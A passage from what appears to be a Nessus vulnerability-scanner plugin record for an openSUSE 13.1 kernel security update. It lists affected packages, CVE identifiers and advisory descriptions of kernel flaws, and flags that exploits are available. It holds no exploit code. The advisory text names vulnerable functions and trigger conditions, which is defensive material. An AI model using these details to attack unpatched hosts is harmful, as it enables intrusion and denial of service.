"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:ipset-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:libipset3-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:iscsitarget", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-xen", "p-cpe:/a:novell:opensuse:crash-gcore-debuginfo", "p-cpe:/a:novell:opensuse:crash-eppic-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop", "p-cpe:/a:novell:opensuse:cloop-debugsource", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:pcfclock-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-debugsource", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:iscsitarget-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:vhba-kmp-xen", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", "p-cpe:/a:novell:opensuse:xtables-addons", "p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ipset-devel", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-xen", "p-cpe:/a:novell:opensuse:cloop-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:cloop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default", "p-cpe:/a:novell:opensuse:crash-devel", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:ipset-kmp-default", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:crash-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "p-cpe:/a:novell:opensuse:cloop-kmp-default", "p-cpe:/a:novell:opensuse:pcfclock", "p-cpe:/a:novell:opensuse:libipset3", "p-cpe:/a:novell:opensuse:crash", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:cloop", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop", "p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop", "p-cpe:/a:novell:opensuse:vhba-kmp-default", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:xtables-addons-debuginfo", "p-cpe:/a:novell:opensuse:ipset-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:iscsitarget-debuginfo", "p-cpe:/a:novell:opensuse:crash-gcore", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-xend-tools", "p-cpe:/a:novell:opensuse:virtualbox-devel", "p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:kernel-default-base", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:ipset", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-debugsource", "p-cpe:/a:novell:opensuse:crash-kmp-default", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo"], "id": "OPENSUSE-2014-793.NASL", "href": "https://www.tenable.com/plugins/nessus/80152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-793.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80152);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2891\", \"CVE-2013-2898\", \"CVE-2013-7263\", \"CVE-2014-0181\", \"CVE-2014-0206\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4171\", \"CVE-2014-4508\", \"CVE-2014-4608\", \"CVE-2014-4611\", \"CVE-2014-4715\", \"CVE-2014-4943\", \"CVE-2014-5077\", \"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-5471\", \"CVE-2014-5472\", \"CVE-2014-6410\", \"CVE-2014-7826\", \"CVE-2014-7841\", \"CVE-2014-7975\", \"CVE-2014-8133\", \"CVE-2014-8709\", \"CVE-2014-8884\", \"CVE-2014-9090\", \"CVE-2014-9322\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-SU-2014:1677-1)\");\n script_summary(english:\"Check for the openSUSE-2014-793 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE 13.1 kernel was updated to fix security issues and bugs :\n\nSecurity issues fixed: CVE-2014-9322: A local privilege escalation in\nthe x86_64 32bit compatibility signal handling was fixed, which could\nbe used by local attackers to crash the machine or execute code.\n\nCVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c\nin the Linux kernel did not properly handle faults associated with the\nStack Segment (SS) segment register, which allowed local users to\ncause a denial of service (panic) via a modify_ldt system call, as\ndemonstrated by sigreturn_32 in the linux-clock-tests test suite.\n\nCVE-2014-8133: Insufficient validation of TLS register usage could\nleak information from the kernel stack to userspace.\n\nCVE-2014-0181: The Netlink implementation in the Linux kernel through\n3.14.1 did not provide a mechanism for authorizing socket operations\nbased on the opener of a socket, which allowed local users to bypass\nintended access restrictions and modify network configurations by\nusing a Netlink socket for the (1) stdout or (2) stderr of a setuid\nprogram. (bsc#875051)\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-3688: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (memory consumption) by\ntriggering a large number of chunks in an association's output queue,\nas demonstrated by ASCONF probes, related to net/sctp/inqueue.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\nnet/sctp/associola.c in the SCTP implementation in the Linux kernel\nallowed remote attackers to cause a denial of service (panic) via\nduplicate ASCONF chunks that trigger an incorrect uncork within the\nside-effect interpreter.\n\nCVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\nkernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\ncalls that change the root filesystem to read-only, which allowed\nlocal users to cause a denial of service (loss of writability) by\nmaking certain unshare system calls, clearing the / MNT_LOCKED flag,\nand making an MNT_FORCE umount system call.\n\nCVE-2014-8884: Stack-based buffer overflow in the\nttusbdecfe_dvbs_diseqc_send_master_cmd function in\ndrivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed\nlocal users to cause a denial of service (system crash) or possibly\ngain privileges via a large message length in an ioctl call.\n\nCVE-2014-3673: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (system crash) via a\nmalformed ASCONF chunk, related to net/sctp/sm_make_chunk.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3186: Buffer overflow in the picolcd_raw_event function in\ndevices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the\nLinux kernel, as used in Android on Nexus 7 devices, allowed\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted device that\nsends a large report.\n\nCVE-2014-7841: The sctp_process_param function in\nnet/sctp/sm_make_chunk.c in the SCTP implementation in the Linux\nkernel, when ASCONF is used, allowed remote attackers to cause a\ndenial of service (NULL pointer dereference and system crash) via a\nmalformed INIT chunk.\n\nCVE-2014-4611: Integer overflow in the LZ4 algorithm implementation,\nas used in Yann Collet LZ4 before r118 and in the lz4_uncompress\nfunction in lib/lz4/lz4_decompress.c in the Linux kernel before\n3.15.2, on 32-bit platforms might allow context-dependent attackers to\ncause a denial of service (memory corruption) or possibly have\nunspecified other impact via a crafted Literal Run that would be\nimproperly handled by programs not complying with an API limitation, a\ndifferent vulnerability than CVE-2014-4715.\n\nCVE-2014-4608: Multiple integer overflows in the lzo1x_decompress_safe\nfunction in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in\nthe Linux kernel allowed context-dependent attackers to cause a denial\nof service (memory corruption) via a crafted Literal Run.\n\nCVE-2014-8709: The ieee80211_fragment function in net/mac80211/tx.c in\nthe Linux kernel did not properly maintain a certain tail pointer,\nwhich allowed remote attackers to obtain sensitive cleartext\ninformation by reading packets.\n\nCVE-2014-3185: Multiple buffer overflows in the\ncommand_port_read_callback function in drivers/usb/serial/whiteheat.c\nin the Whiteheat USB Serial Driver in the Linux kernel allowed\nphysically proximate attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and system crash) via a crafted\ndevice that provides a large amount of (1) EHCI or (2) XHCI data\nassociated with a bulk response.\n\nCVE-2014-3184: The report_fixup functions in the HID subsystem in the\nLinux kernel might have allowed physically proximate attackers to\ncause a denial of service (out-of-bounds write) via a crafted device\nthat provides a small report descriptor, related to (1)\ndrivers/hid/hid-cherry.c, (2) drivers/hid/hid-kye.c, (3)\ndrivers/hid/hid-lg.c, (4) drivers/hid/hid-monterey.c, (5)\ndrivers/hid/hid-petalynx.c, and (6) drivers/hid/hid-sunplus.c.\n\nCVE-2014-3182: Array index error in the logi_dj_raw_event function in\ndrivers/hid/hid-logitech-dj.c in the Linux kernel allowed physically\nproximate attackers to execute arbitrary code or cause a denial of\nservice (invalid kfree) via a crafted device that provides a malformed\nREPORT_TYPE_NOTIF_DEVICE_UNPAIRED value.\n\nCVE-2014-3181: Multiple stack-based buffer overflows in the\nmagicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the\nMagic Mouse HID driver in the Linux kernel allowed physically\nproximate attackers to cause a denial of service (system crash) or\npossibly execute arbitrary code via a crafted device that provides a\nlarge amount of (1) EHCI or (2) XHCI data associated with an event.\n\nCVE-2014-7826: kernel/trace/trace_syscalls.c in the Linux kernel did\nnot properly handle private syscall numbers during use of the ftrace\nsubsystem, which allowed local users to gain privileges or cause a\ndenial of service (invalid pointer dereference) via a crafted\napplication.\n\nCVE-2013-7263: The Linux kernel updated certain length values before\nensuring that associated data structures have been initialized, which\nallowed local users to obtain sensitive information from kernel stack\nmemory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call,\nrelated to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c,\nnet/ipv6/raw.c, and net/ipv6/udp.c. This update fixes the leak of the\nport number when using ipv6 sockets. (bsc#853040).\n\nCVE-2013-2898: Fixed potential kernel caller confusion via\npast-end-of-heap-allocation read in sensor-hub HID driver.\n\nCVE-2013-2891: Fixed 16 byte past-end-of-heap-alloc zeroing in\nsteelseries HID driver.\n\nVE-2014-6410: The __udf_read_inode function in fs/udf/inode.c in the\nLinux kernel did not restrict the amount of ICB indirection, which\nallowed physically proximate attackers to cause a denial of service\n(infinite loop or stack consumption) via a UDF filesystem with a\ncrafted inode.\n\nCVE-2014-5471: Stack consumption vulnerability in the\nparse_rock_ridge_inode_internal function in fs/isofs/rock.c in the\nLinux kernel allowed local users to cause a denial of service\n(uncontrolled recursion, and system crash or reboot) via a crafted\niso9660 image with a CL entry referring to a directory entry that has\na CL entry.\n\nCVE-2014-5472: The parse_rock_ridge_inode_internal function in\nfs/isofs/rock.c in the Linux kernel allowed local users to cause a\ndenial of service (unkillable mount process) via a crafted iso9660\nimage with a self-referential CL entry.\n\nCVE-2014-0206: Array index error in the aio_read_events_ring function\nin fs/aio.c in the Linux kernel allowed local users to obtain\nsensitive information from kernel memory via a large head value.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5206: The do_remount function in fs/namespace.c in the Linux\nkernel did not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allowed local users to bypass an intended\nread-only restriction and defeat certain sandbox protection mechanisms\nvia a 'mount -o remount' command within a user namespace.\n\nCVE-2014-5207: fs/namespace.c in the Linux kernel did not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allowed local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nCVE-2014-1739: The media_device_enum_entities function in\ndrivers/media/media-device.c in the Linux kernel did not initialize a\ncertain data structure, which allowed local users to obtain sensitive\ninformation from kernel memory by leveraging /dev/media0 read access\nfor a MEDIA_IOC_ENUM_ENTITIES ioctl call.\n\nCVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\nLinux kernel allowed local users to gain privileges by leveraging\ndata-structure differences between an l2tp socket and an inet socket.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c\nin the Linux kernel, when SCTP authentication is enabled, allowed\nremote attackers to cause a denial of service (NULL pointer\ndereference and OOPS) by starting to establish an association between\ntwo endpoints immediately after an exchange of INIT and INIT ACK\nchunks to establish an earlier association between these endpoints in\nthe opposite direction.\n\nCVE-2014-4171: mm/shmem.c in the Linux kernel did not properly\nimplement the interaction between range notification and hole\npunching, which allowed local users to cause a denial of service\n(i_mutex hold) by using the mmap system call to access a hole, as\ndemonstrated by interfering with intended shmem activity by blocking\ncompletion of (1) an MADV_REMOVE madvise call or (2) an\nFALLOC_FL_PUNCH_HOLE fallocate call.\n\nAlso the following bugs were fixed :\n\n - KEYS: Fix stale key registration at error path\n (bnc#908163).\n\n - parport: parport_pc, do not remove parent devices early\n (bnc#856659).\n\n - xfs: fix directory hash ordering bug.\n\n - xfs: mark all internal workqueues as freezable\n (bnc#899785).\n\n - [media] uvc: Fix destruction order in uvc_delete()\n (bnc#897736).\n\n - cfq-iosched: Fix wrong children_weight calculation\n (bnc#893429).\n\n - target/rd: Refactor rd_build_device_space +\n rd_release_device_space (bnc#882639).\n\n - Btrfs: Fix memory corruption by ulist_add_merge() on\n 32bit arch (bnc#887046).\n\n - usb: pci-quirks: Prevent Sony VAIO t-series from\n switching usb ports (bnc#864375).\n\n - xhci: Switch only Intel Lynx Point-LP ports to EHCI on\n shutdown (bnc#864375).\n\n - xhci: Switch Intel Lynx Point ports to EHCI on shutdown\n (bnc#864375).\n\n - ALSA: hda - Fix broken PM due to incomplete i915\n initialization (bnc#890114).\n\n - netbk: Don't destroy the netdev until the vif is shut\n down (bnc#881008).\n\n - swiotlb: don't assume PA 0 is invalid (bnc#865882).\n\n - PM / sleep: Fix request_firmware() error at resume\n (bnc#873790).\n\n - usbcore: don't log on consecutive debounce failures of\n the same port (bnc#818966).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=818966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=835839\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=853040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=856659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=864375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=865882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=873790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=875051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=881008\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=882639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=882804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883724\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=884324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=887046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=887082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=889173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=890114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=891689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=892490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=893429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=897736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=899785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=900392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=902346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=902349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=902351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=904013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=904700\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905744\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=907818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=908163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=909077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-12/msg00076.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 